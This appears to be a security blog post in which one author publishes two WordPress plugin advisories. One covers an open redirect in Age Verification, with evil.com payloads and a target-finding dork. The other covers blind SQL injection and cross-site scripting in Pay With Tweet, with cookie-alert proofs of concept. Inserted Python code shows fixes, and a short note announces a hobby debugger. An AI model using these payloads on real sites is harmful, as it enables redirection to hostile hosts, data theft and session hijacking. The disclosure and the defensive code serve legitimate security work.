# Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4
Via GET:

http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com

The rendered page will provide a link to http://www.evil.com
Via POST:

http://server/wp-content/plugins/age-verification/age-verification.php
redirect_to: http://www.evil.com
age_day: 1
age_month: 1
age_year: 1970

Direct redirect to http://www.evil.com
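As an added example, not code from the advisory or from the plugin: the check a `redirect_to` handler needs so that a value like the one above cannot send the browser off-site. The host name `server` is taken from the advisory's example URLs; the function names and the fallback path are my own assumptions.

```python
from typing import Optional
from urllib.parse import urlsplit

# "server" stands in for the site's own host name, as in the advisory URLs.
SITE_HOST = "server"


def is_safe_redirect(target: Optional[str], site_host: str = SITE_HOST) -> bool:
    """Return True only if `target` cannot send the browser off-site.

    Accepted: site-relative paths ("/", "/wp-admin/") and absolute http(s)
    URLs whose host is exactly `site_host`.
    Rejected: any other host, protocol-relative "//evil.com" (including the
    backslash variant "/\\evil.com" that browsers normalise to "//"),
    user-info tricks ("http://server@evil.com"), non-http schemes such as
    "javascript:", and empty values.
    """
    if not target:
        return False
    # Browsers treat backslashes like forward slashes; normalise first so
    # "/\\evil.com" is parsed the way a browser would parse it.
    candidate = target.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, ftp: ... never acceptable
    if parts.netloc:
        # Absolute or protocol-relative URL: the parsed host (not the raw
        # netloc, which may carry user@ or :port) must be our own.
        return parts.hostname == site_host.lower()
    # No authority part: accept a path that starts with exactly one "/".
    return candidate.startswith("/") and not candidate.startswith("//")


def safe_redirect_target(target: Optional[str], fallback: str = "/") -> str:
    """What a redirect_to handler should emit: the target if it passes the
    check, otherwise a fixed on-site fallback (assumed here to be "/")."""
    return target.strip() if is_safe_redirect(target) else fallback


if __name__ == "__main__":
    for value in ("http://www.evil.com", "//www.evil.com", "/wp-admin/", "http://server/x"):
        print(f"{value!r:28} -> {safe_redirect_target(value)}")
```

Comparing the parsed host name rather than the raw string is the point: `http://server@www.evil.com/` and `http://server.evil.com/` both contain the site's name yet parse to a foreign host, and a bare string-prefix check would let them through.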
# Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1

1) Blind SQL Injection in shortcode:
The shortcode parameter 'id' is prone to blind SQL injection; you need to be able to write a post or page to exploit this:
[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]

2) Multiple XSS in pay.php
http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php
After connecting to twitter:
?link=%22></input>[XSS]

After submitting the tweet:
?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]

The final download link will be replaced with [REDIRECT-TO-URL]
POC:
pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"<script>alert(document.cookie)</script>
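As an added example, not code from the advisory or from the plugin: Python stand-ins for the two flawed spots above, the shortcode `id` reaching SQL as text and `pay.php` echoing `link`, `title` and `dl` into HTML, each beside a hardened form. The table layout, the markup shapes and the function names are assumptions; the payloads are the advisory's own.

```python
import html
import sqlite3
from typing import Optional
from urllib.parse import urlsplit


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the plugin's storage: one row in an in-memory
    SQLite table. Table and column names are assumptions, not the plugin's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE paywithtweet (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO paywithtweet VALUES (1, 'Demo file')")
    conn.commit()
    return conn


def build_query_unsafe(shortcode_id: str) -> str:
    """The vulnerable pattern: the shortcode attribute is spliced into the SQL
    text. Only the statement string is returned, to show that the attacker's
    attribute value becomes part of the query."""
    return f"SELECT title FROM paywithtweet WHERE id = '{shortcode_id}'"


def parse_id(raw) -> Optional[int]:
    """Accept only a positive integer id (the same idea as WordPress absint())."""
    try:
        value = int(str(raw).strip())
    except ValueError:
        return None
    return value if value > 0 else None


def fetch_title(conn: sqlite3.Connection, shortcode_id) -> Optional[str]:
    """Hardened lookup: validated integer plus a parameterised query, so the
    attribute can never alter the statement's structure."""
    ident = parse_id(shortcode_id)
    if ident is None:
        return None
    row = conn.execute("SELECT title FROM paywithtweet WHERE id = ?", (ident,)).fetchone()
    return row[0] if row else None


def render_link_input_unsafe(link: str) -> str:
    """pay.php-style output with the parameter echoed raw into an attribute."""
    return f'<input type="hidden" name="link" value="{link}">'


def render_link_input(link: str) -> str:
    """Attribute-context escaping: the quote that closes the attribute and
    the angle brackets that open a new tag all become entities."""
    return f'<input type="hidden" name="link" value="{html.escape(link, quote=True)}">'


def render_download_link(title: str, dl: str) -> str:
    """Download anchor: only an absolute http(s) URL is accepted for href,
    and both values are escaped for their HTML contexts."""
    parts = urlsplit(dl)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return html.escape(title, quote=True)  # no link at all for a bad URL
    return f'<a href="{html.escape(dl, quote=True)}">{html.escape(title, quote=True)}</a>'


if __name__ == "__main__":
    db = build_demo_db()
    print(build_query_unsafe("1' AND 1=2"))
    print(fetch_title(db, "1"), fetch_title(db, "1' AND 1=1"))
    print(render_link_input('"></input><script>alert(document.cookie)</script>'))
```

Escaping alone is enough for `link` and `title`, but `dl` lands in an `href`, where a well-escaped `javascript:` URL is still executed on click; that is why the hardened anchor also restricts the scheme instead of relying on `html.escape`.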
Simple Debugger (sdbg) is a minimal Windows debugger I wrote to sharpen my knowledge of debugging practices.
It is written in Python and, naturally, built on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg, since I was already familiar with it.
At the time of this writing it is capable of setting software, hardware and memory breakpoints; it has a minimal interactive shell to retrieve register status, and it is extensible with custom callbacks for handling exceptions.
Building a debugger has been an awesome experience (except for the parts where I was swearing at the IA-32 Intel docs) and I really learned a lot - and this was the main goal.
Since I am starting to get my feet wet in reverse engineering, I am looking to eat my own dog food and use it for analysing some samples from my malware collection. This way I hope to keep it updated and maybe add some new features too.
As usual everything is GPL'd and you can find it on my Bitbucket page.